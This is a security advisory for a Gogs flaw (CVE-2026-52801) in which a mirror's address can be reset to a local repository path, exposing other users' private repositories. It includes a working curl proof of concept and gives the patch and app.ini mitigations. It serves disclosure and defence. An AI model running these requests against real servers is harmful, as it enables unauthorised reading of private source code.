high · 8.1CVE-2026-52801Jun 26, 2026

CVE-2026-52801: Gogs Mirror Settings SSRF and Local Repository Import

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

Any authenticated Gogs user can bypass the protection on the New Migration feature by updating a mirrored repository's address to a local filesystem path or internal URL, letting them read any repo th

Packagegogs.io/gogs
Ecosystemgo
Affected< 0.14.3
Fixed in0.14.3
CVE-2026-52801: Gogs Mirror Settings SSRF and Local Repository Import

The problem

Gogs's New Migration flow validates the clone address and blocks local paths. The Mirror Settings update path (the SaveAddress handler) skips that same check entirely.

Any authenticated user who owns or administers a mirrored repo can overwrite the mirror address with an arbitrary value. On the next sync, Gogs runs git fetch against whatever address was saved, including local paths like /home/git/repositories/victim/secret.git or internal http:// addresses.

Proof of concept

bash
# Step 1: create a normal mirror from any reachable remote
curl -X POST 'http://gogs.example.com/api/v1/repos/migrate' \
  -H 'Authorization: token <YOUR_TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{"clone_addr":"https://github.com/any/public-repo","uid":1,"repo_name":"loot","mirror":true}'

# Step 2: overwrite the mirror address with a local repo path
#  (POST to the Mirror Settings form under /<user>/<repo>/settings/mirror)
curl -X POST 'http://gogs.example.com/<user>/loot/settings/mirror' \
  -H 'Authorization: token <YOUR_TOKEN>' \
  -d 'action=mirror&interval=10m&address=/home/git/repositories/victim/private.git'

# Step 3: trigger an immediate sync
curl -X POST 'http://gogs.example.com/<user>/loot/settings/mirror' \
  -H 'Authorization: token <YOUR_TOKEN>' \
  -d 'action=sync'

# Result: Gogs clones /home/git/repositories/victim/private.git into the
# attacker-owned repo, exposing all commits and files via the normal web UI.

The root cause is a missing call to the same address-validation logic that protects New Migration. The patch (PR #8225, commit 11e19f28) adds that validation to the SaveAddress handler so local paths and blocked network ranges are rejected before being persisted.

Without the check, git is invoked with attacker-controlled input and happily fetches from file:// or local paths, bypassing all access controls at the application layer. The CVSS score (8.1) reflects high confidentiality and availability impact because an attacker can read any repo the git OS user owns, and a bad path can also cause the mirror worker to hang (CWE-20).

The fix

Upgrade to Gogs 0.14.3. The fix is in PR #8225 (commit 11e19f28b5c82466fd1689c94344ef4313ee986c), which applies the same remote-address validation already present in New Migration to the Mirror Settings SaveAddress handler. If you cannot upgrade immediately, set ENABLE_LOCAL_PATH_MIGRATION = false in app.ini and restrict open registration (DISABLE_REGISTRATION = true) to reduce the attack surface.

Reported by wuhan005.

References: [1][2][3][4][5]